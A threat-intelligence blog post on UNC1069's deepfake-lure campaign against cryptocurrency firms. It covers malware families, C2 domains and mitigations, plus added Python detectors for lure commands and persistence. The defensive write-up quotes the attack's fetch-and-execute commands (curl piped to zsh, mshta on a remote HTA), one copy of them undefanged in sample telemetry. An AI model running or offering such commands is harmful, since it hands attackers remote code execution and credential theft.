UNC1069 Targets Cryptocurrency Organizations with AI Deepfake Lures and Multi-Stage Malware on Windows and macOS

  • Rescana
  • 17 hours ago
  • 5 min read
Executive Summary

The North Korea-linked threat actor UNC1069 has escalated its offensive operations against cryptocurrency organizations by integrating advanced artificial intelligence (AI) lures and multi-stage malware into its attack arsenal. Recent campaigns have demonstrated the use of AI-generated deepfake videos, sophisticated social engineering, and a modular malware framework targeting both Windows and macOS environments. The primary objective of these attacks is the exfiltration of credentials, session tokens, and sensitive data, ultimately enabling large-scale financial theft and further compromise of the cryptocurrency ecosystem. This report provides a comprehensive technical analysis of the tactics, techniques, and procedures (TTPs) employed by UNC1069, outlines observed exploitation in the wild, and offers actionable mitigation strategies for organizations operating in the digital asset sector.

Threat Actor Profile

UNC1069 is a financially motivated advanced persistent threat (APT) group with strong ties to North Korea, overlapping with the infamous Lazarus Group and Bluenoroff. The group is known for targeting cryptocurrency exchanges, DeFi platforms, fintech startups, and venture capital firms. UNC1069 has demonstrated a high degree of operational security, leveraging compromised social media accounts, AI-powered impersonation, and custom malware to achieve its objectives. The group’s campaigns are characterized by persistent reconnaissance, tailored social engineering, and rapid adaptation to security controls, making them a formidable adversary in the cryptocurrency threat landscape.

Technical Analysis of Malware/TTPs

UNC1069’s attack chain is initiated through highly targeted social engineering, often leveraging compromised Telegram accounts of industry executives. Victims are lured into joining fake video conferences hosted on attacker-controlled infrastructure, such as domains mimicking Zoom (e.g., zoom[.]uswe05[.]us). During these sessions, AI-generated deepfake videos and voice synthesis are used to impersonate trusted figures, increasing the likelihood of victim compliance.

The infection vector relies on convincing victims to execute “troubleshooting” commands under the guise of resolving audio or connectivity issues. On macOS, the command typically uses curl to fetch and execute a remote script, while on Windows, mshta is used to execute a malicious HTML application. Example commands include:

For macOS:

  curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh

For Windows:

  mshta hxxp://mylingocoin[.]com/audio/fix/6454694440

Upon execution, a multi-stage malware framework is deployed, consisting of the following components:

  • WAVESHAPER acts as the initial backdoor, collecting system information and downloading additional payloads.
  • HYPERCALL is a Go-based downloader that reflectively loads further malware modules.
  • HIDDENCALL provides hands-on-keyboard access for interactive exploitation.
  • SUGARLOADER is a downloader responsible for deploying data-mining modules.
  • SILENCELIFT is a minimal backdoor that beacons host information and can disrupt Telegram processes to hinder detection.
  • DEEPBREATH is a Swift-based data miner that manipulates the macOS Transparency, Consent, and Control (TCC) database to escalate privileges and access sensitive data, including credentials, browser data, Telegram sessions, and Apple Notes.
  • CHROMEPUSH is a C++ data miner masquerading as a Chrome or Brave extension, capable of logging keystrokes and exfiltrating cookies and credentials.

Persistence is achieved through the creation of launch daemons on macOS and the installation of malicious browser extension native messaging hosts. Data exfiltration is staged in temporary folders, compressed, and transmitted via curl or HTTP POST requests to attacker-controlled command and control (C2) servers.
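An added Python example (not Rescana's, Mandiant's or Apple's code) of the audit the two persistence mechanisms above call for: it checks a browser native messaging host manifest and a launchd property list for the traits an implant leaves behind. The trusted and suspicious path lists, the heuristics and the two samples are constructed assumptions for this example; in practice the manifests come from the browsers' NativeMessagingHosts directories and the plists from /Library/LaunchDaemons.

```python
import plistlib

# Where legitimate daemon and native messaging host binaries normally live, and where
# persistence implants tend to hide; both lists are assumptions for this example.
TRUSTED_PREFIXES = ("/Applications/", "/usr/", "/bin/", "/sbin/", "/System/", "/Library/Apple/", "/opt/")
SUSPICIOUS_PREFIXES = ("/tmp/", "/var/tmp/", "/private/tmp/", "/Users/Shared/", "/var/folders/")

def classify_path(path: str):
    """Return a label for an executable path that is unlikely for legitimate software, else None."""
    if path.startswith(SUSPICIOUS_PREFIXES) or "/." in path:  # temp or hidden directory
        return "binary_in_temp_or_hidden_dir"
    if not path.startswith(TRUSTED_PREFIXES):
        return "binary_outside_trusted_dirs"
    return None

def audit_native_messaging_manifest(manifest: dict) -> list:
    """Checks on a parsed Chrome/Brave native messaging host manifest (JSON)."""
    findings = []
    label = classify_path(manifest.get("path", ""))
    if label:
        findings.append(label)
    # Masquerading pattern from the report: a Google-looking host name whose
    # binary sits somewhere no Google component would be installed.
    if "google" in manifest.get("name", "").lower() and label:
        findings.append("google_name_with_untrusted_binary")
    return findings

def audit_launchd_plist(plist_bytes: bytes) -> list:
    """Checks on a LaunchDaemon/LaunchAgent property list."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    # Every absolute path in the job, deduplicated, goes through the path check
    findings = list(dict.fromkeys(filter(None, (classify_path(a) for a in args if a.startswith("/")))))
    # A shell started with -c at boot usually hides the real payload in its argument
    if args[0].rsplit("/", 1)[-1] in ("sh", "zsh", "bash") and "-c" in args:
        findings.append("shell_command_in_program_arguments")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("run_at_load_and_keep_alive")
    return findings

# Constructed samples, not real artifacts from the campaign.
SAMPLE_MANIFEST = {
    "name": "com.google.docs_offline_host", "type": "stdio",
    "path": "/Users/Shared/.cache/dochost",
    "allowed_origins": ["chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"],
}
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.example.audiofix", "RunAtLoad": True, "KeepAlive": True,
    "ProgramArguments": ["/bin/zsh", "-c", "/Users/Shared/.cache/agent"],
})
```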

Key C2 infrastructure includes domains such as mylingocoin.com, zoom.uswe05.us, breakdream.com, dreamdie.com, support-zoom.us, supportzm.com, zmsupport.com, and cmailer.pro. Host-based indicators of compromise (IOCs) include specific file paths and SHA-256 hashes associated with each malware component.

The attack chain maps to several MITRE ATT&CK techniques, including T1566.002 (Spearphishing via Service), T1059 (Command and Scripting Interpreter), T1543.004 (Launch Daemon), T1176 (Browser Extensions), T1555 (Credentials from Password Stores), T1114 (Email Collection), T1119 (Automated Collection), and T1041 (Exfiltration Over C2 Channel).

Exploitation in the Wild

UNC1069’s campaigns have been observed targeting cryptocurrency startups, DeFi platforms, software developers, and venture capital firms across North America, Europe, and Asia. The group’s use of AI-generated lures has resulted in successful credential theft, session hijacking, and large-scale exfiltration of browser and wallet data. Notably, a recent investigation by Mandiant uncovered the deployment of seven distinct malware families within a single fintech organization, underscoring the group’s technical sophistication and persistence.

Victims are typically high-value individuals with access to cryptocurrency wallets, exchange infrastructure, or sensitive financial data. The impact of these attacks includes unauthorized fund transfers, compromise of multi-factor authentication mechanisms, and the potential for downstream supply chain attacks via compromised developer accounts.

Victimology and Targeting

The primary targets of UNC1069 are organizations and individuals operating within the cryptocurrency and Web3 sectors. This includes cryptocurrency exchanges, DeFi platforms, wallet providers, software developers, and venture capital funds with exposure to digital assets. The group’s targeting is global but has shown a particular focus on entities in North America, Europe, and Asia. Victims are often selected based on their access to high-value assets or privileged credentials, and the group employs extensive reconnaissance to tailor its social engineering lures.

Mitigation and Countermeasures

Organizations are advised to implement a multi-layered defense strategy to mitigate the risk posed by UNC1069. Key recommendations include:

  • Monitoring for outbound connections to known C2 domains and IP addresses associated with the group’s infrastructure, such as mylingocoin.com, breakdream.com, and cmailer.pro.
  • Auditing for the presence of unusual launch daemons, browser extensions, and native messaging hosts, particularly those masquerading as legitimate services like Google Docs Offline.
  • Educating employees and executives about the risks of social engineering, especially unsolicited requests to execute troubleshooting commands or join video calls from unfamiliar domains.
  • Implementing strict application whitelisting and endpoint detection and response (EDR) solutions capable of detecting the execution of suspicious commands, such as curl or mshta, from untrusted sources.
  • Regularly reviewing and hardening the macOS TCC database to prevent unauthorized privilege escalation and data access.
  • Conducting proactive threat hunting for the specific file paths and SHA-256 hashes associated with UNC1069 malware components, as referenced in the technical analysis section.
  • Enforcing strong multi-factor authentication (MFA) and monitoring for anomalous login activity, particularly from new devices or locations.
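To turn the lure commands in the technical analysis and the first and fourth recommendations above into something a detection engineer can run, here is an added Python example (not Rescana's or Mandiant's code) that flags curl piped into a shell and mshta launched against a URL in process telemetry, and matches process and network events against the domains the report lists. The event schema and the sample events are constructed for this example.

```python
import re

# Domains from the report's C2 section; a real deployment would load these from
# a threat-intelligence feed rather than hard-code them.
C2_DOMAINS = {
    "mylingocoin.com", "zoom.uswe05.us", "breakdream.com", "dreamdie.com",
    "support-zoom.us", "supportzm.com", "zmsupport.com", "cmailer.pro",
}
URL_HOST_RE = re.compile(r"https?://([^/\s|]+)", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/\S*/)?(?:zsh|bash|sh)\b")

def is_c2_domain(host: str) -> bool:
    """True if host is a listed C2 domain or a subdomain of one (port stripped)."""
    host = host.lower().rstrip(".").split(":")[0]
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)

def classify_command(cmdline: str) -> list:
    """Labels for the lure patterns found in one process command line."""
    findings, low = [], cmdline.lower()
    hosts = URL_HOST_RE.findall(cmdline)
    image = (low.split() or [""])[0].rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    # macOS lure: curl fetches a remote URL and pipes it straight into a shell
    if "curl" in low and hosts and PIPE_TO_SHELL_RE.search(low):
        findings.append("curl_pipe_to_shell")
    # Windows lure: mshta launches an HTML application straight from a URL
    if image in ("mshta", "mshta.exe") and hosts:
        findings.append("mshta_remote_hta")
    if any(is_c2_domain(h) for h in hosts):
        findings.append("known_c2_domain")
    return findings

def scan_events(events: list) -> list:
    """Run the checks over EDR-style events and return (event_id, label) pairs."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            hits += [(ev["id"], f) for f in classify_command(ev["cmdline"])]
        elif ev["type"] == "network" and is_c2_domain(ev["domain"]):
            hits.append((ev["id"], "known_c2_domain"))
    return hits

# Constructed sample telemetry (not real captures): the two lure commands from the
# report, one benign curl download, one lookup of a C2 subdomain, one benign lookup.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "cmdline": "curl -A audio -s http://mylingocoin.com/audio/fix/6454694440 | zsh"},
    {"id": 2, "type": "process", "cmdline": "mshta http://mylingocoin.com/audio/fix/6454694440"},
    {"id": 3, "type": "process", "cmdline": "curl -sSL https://example.com/tool.tar.gz -o tool.tar.gz"},
    {"id": 4, "type": "network", "domain": "api.breakdream.com"},
    {"id": 5, "type": "network", "domain": "zoom.us"},
]
```

Calling scan_events(SAMPLE_EVENTS) yields hits for events 1, 2 and 4 only; the benign download and the legitimate zoom.us lookup produce nothing.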

For organizations seeking to enhance their third-party risk management posture, Rescana’s TPRM platform provides continuous monitoring and assessment of vendor and supply chain security, helping to identify and mitigate exposure to advanced threats such as those posed by UNC1069.

References

Google Cloud Blog: UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering

The Hacker News: North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html

Mandiant X (Twitter) Announcement https://x.com/Mandiant/status/2020965935239045434

MITRE ATT&CK: North Korea / Lazarus Group https://attack.mitre.org/groups/G0032/

Decrypt: Google Threat Report Links AI-powered Malware to DPRK Crypto Theft https://decrypt.co/347781/google-threat-report-links-ai-powered-malware-to-dprk-crypto-theft

About Rescana

Rescana is a leader in third-party risk management, providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their vendor and supply chain ecosystem. Our advanced analytics and threat intelligence capabilities empower security teams to proactively identify vulnerabilities and respond to emerging threats. For more information or to discuss how Rescana can support your organization’s cybersecurity objectives, please contact us at ops@rescana.com.